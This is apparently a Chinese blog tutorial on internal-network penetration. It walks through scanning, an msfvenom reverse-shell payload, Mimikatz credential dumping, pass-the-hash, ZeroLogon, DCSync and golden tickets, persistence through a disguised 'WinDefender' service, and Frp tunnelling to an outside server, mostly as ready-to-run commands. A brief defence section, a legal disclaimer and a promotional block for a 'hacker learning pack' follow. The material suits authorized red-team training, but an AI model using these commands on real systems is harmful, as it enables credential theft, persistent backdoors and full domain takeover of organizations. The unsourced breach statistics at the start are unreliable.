近年来,内网安全已成为攻防对抗的核心战场。据统计,2024年全球因内网渗透导致的数据泄露事件同比增长67%,其中超过80%的攻击通过横向移动实现全域控制。本文基于最新攻防技术与实战案例,系统化拆解内网渗透全流程,并提供可落地的防御建议。
一、环境准备:搭建安全实验环境
1.1 基础架构设计
-
• 靶机配置:建议使用VMware或VirtualBox搭建包含以下角色的实验环境:
-
• 域控制器(Windows Server 2025)
-
• 成员服务器(Windows 10/11)
-
• 开发主机(Kali Linux 2025)
-
• 边界防火墙(pfSense)
-
• 网络拓扑:采用双网卡隔离环境,外网段(NAT模式)与内网段(仅主机模式)分离,模拟真实企业架构。
1.2 工具集部署
| 工具类型 | 核心工具 | 功能定位 |
|---|---|---|
| 信息收集 | P1soda、Nmap | 主机探测与端口指纹识别 |
| 漏洞利用 | Metasploit、Cobalt Strike | 漏洞验证与载荷投递 |
| 横向移动 | Impacket、Mimikatz | 哈希传递与票据伪造 |
| 隧道代理 | Frp、reGeorg | 内网穿透与流量隐匿 |
| 权限维持 | SharPersist、PowerSploit | 后门植入与持久化控制 |
注意:所有工具需在授权环境中使用,禁止用于非法测试。
二、信息收集:绘制内网全景地图
2.1 主机存活探测
使用P1soda进行快速扫描,结合ICMP/TCP混合探测策略:
./p1soda scan -t 192.168.1.0/24 -m hybrid -o result.txt
通过分析响应包TTL值可初步判断操作系统类型(Windows TTL=128,Linux TTL=64)。
2.2 端口与服务识别
利用Nmap高级扫描技术:
nmap -sS -sV --script vuln -p- -T4 192.168.1.100
重点关注高危端口:
-
• 445/SMB:永恒之蓝漏洞利用点
-
• 5985/WinRM:远程命令执行入口
-
• 6379/Redis:未授权访问风险
2.3 域信息提取
通过PowerShell获取域环境信息:
Get-ADDomain | Select DNSRoot, DomainMode net group"Domain Admins" /domain
记录域控IP、域管理员账户及组策略版本。
三、权限提升:突破安全边界
3.1 系统漏洞利用
针对Windows系统常见提权路径:
-
- 补丁比对:执行
systeminfo比对漏洞库(如MS14-058、CVE-2023-21608)
- 补丁比对:执行
-
- EXP投递:使用Metasploit生成载荷:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe > exploit.exe
-
- 会话建立:通过钓鱼邮件或漏洞上传触发载荷。
3.2 凭证窃取技术
使用Mimikatz提取内存凭证:
privilege::debug sekurlsa::logonpasswords
重点关注:
-
• NTLM Hash:用于Pass-the-Hash攻击
-
• Kerberos票据:黄金票据制作原料
四、横向移动:穿透内网防线
4.1 哈希传递攻击(PtH)
利用Impacket工具包执行远程命令:
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 administrator@192.168.1.100
防御突破:启用Credential Guard可阻断99%的PtH攻击。
4.2 WMI远程控制
通过wmiexec实现无文件攻击:
python3 wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.1.100 "whoami"
优势:不落盘、无日志记录,绕过EDR监控。
4.3 域控攻陷实战
-
- ZeroLogon漏洞利用:
python3 zerologon_tester.py DC01 192.168.1.10
-
- 哈希导出与票据伪造:
lsadump::dcsync /domain:test.com /user:krbtgt kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-123456789 /krbtgt:aa3b435b51404eeaad3b435b51404ee /ptt
-
- 全域控制验证:
Enter-PSSession-ComputerName DC01 -Credential (Get-Credential)
五、权限维持:构建持久化通道
5.1 后门植入技术
- • 计划任务:创建定时启动项
schtasks /create /tn "UpdateService" /tr C:\backdoor.exe /sc hourly /mo 1 /ru SYSTEM
- • 服务注册:伪装系统服务
New-Service-Name"WinDefender"-BinaryPathName"C:\backdoor.exe"
5.2 隧道搭建方案
| 隧道类型 | 工具 | 适用场景 |
|---|---|---|
| HTTP隧道 | reGeorg | Web服务器出网 |
| DNS隧道 | dnscat2 | 严格流量管控环境 |
| ICMP隧道 | Ptunnel | 仅允许Ping通信 |
| 多级代理 | Frp+CobaltStrike | 复杂网络架构穿透 |
| 示例命令: |
# Frp服务端配置 ./frps -c frps.ini -bind_port 7000 # Frp客户端配置 ./frpc -c frpc.ini -server_addr 10.0.0.5 -server_port 7000
六、防御升级:企业防护体系构建
6.1 零信任架构(ZTA 2.0)
-
• 持续认证:设备指纹+行为分析动态验证
-
• 微隔离策略:按业务单元划分网络域
-
• 最小权限原则:JIT(Just-In-Time)临时权限授予
6.2 威胁狩猎体系
-
• AI流量探针:基线建模检测异常行为
-
• 诱捕网络:部署虚假资产迷惑攻击者
-
• 自动化响应:15秒内隔离感染终端
七、法律声明
-
- 授权测试:必须取得书面渗透授权
-
- 数据保护:禁止泄露任何敏感信息
-
- 合规工具:使用开源自研工具规避法律风险
-
- 报告机制:发现漏洞后72小时内提交SRC平台
攻防对抗的本质是认知较量
内网渗透的本质是攻击方与防御方在技术、策略、响应速度上的多维博弈。建议企业每季度开展红蓝对抗演练,并引入MITRE ATT&CK框架完善防御体系。记住:安全是一个过程,而非终点。
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
扫一扫
3202
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
